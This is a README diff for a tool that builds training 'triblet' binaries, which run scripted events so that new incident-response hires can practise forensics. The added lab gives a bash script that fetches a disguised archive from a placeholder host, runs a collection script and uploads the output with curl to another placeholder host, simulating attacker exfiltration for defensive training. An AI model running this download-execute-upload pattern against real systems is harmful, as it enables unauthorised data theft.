thedunston/troublevent/README.md

 `go build -o Question1Week9Lab.exe`

 The triblet gets posted to a web server and the student downloads it and executes 'Question1Week9Lab.exe' and should be able to respond that the cmdlet Get-Process was executed based on the output.

+### Simulate an 'acker downloading a script, excuting it, and uploading the results.
+Here you can test a new hires forensic skills based on what information they ask for to start the investigation and the process they perform to determine what happened.
+Test their network flow analysis and host-based forensic analysis skills to determine what occurred on the host.

+`cp -r runscript Lab18`

+`cd Lab18`

+`gedit script.yaml`

+     ---
+       # Filename for the script.
+Temporary and will be deleted
+       # just before the triblet terminates.
+       theFile: "first.bash"
+       # Shell to execute the script.
+       # theShell: powershell.exe
+       # theShell: cmd.exe
+       theShell: "/usr/bin/bash"
+       # For the script, indent 2 spaces under "theScript: |-2
+       # In order to preserve the newlines.
+       # Leave: theScript: |-2
+       # It tells the viper parser to preserve newlines
+       # for lines with two space indentions under the key: theScript
+       # Be sure the last line of the script is: exit 0
+       # so it can be deleted before the triblet terminates
+       theScript: |-2
+         #!/bin/bash

+         ## Simulate a script collection and upload
+         wget hxxp://somehost/aserq.jpg -O files.zip
+         unzip files.zip
+         cd files
+         chmod +x collect.sh
+         ./collect.sh
+         gzip output.txt
+         curl -F 'f=output.gz' hxxp://anotherhose/upload.php

+         # Be sure to include exit 0
+         # so the script will be deleted
+         # by the triblet.
+         exit 0
+         # Or just ask the user what command was used to generate the output
+         theMsg: "An IDS alerted to a host communicating with a known malicious IP.
+Investigate and find out what happened."

+Save the file and run:

+`go run script.go`

+Fix any issues and then build.

+`go build -o Lab18.bin`

+You have a new incident response hire and assessing their skill level to determine the training and mentoring they need.
+On a VM, the new hire downloads Lab18.bin and then sees the message "An IDS alerted to a host communicating with a known malicious IP.
+Investigate and find out what happened."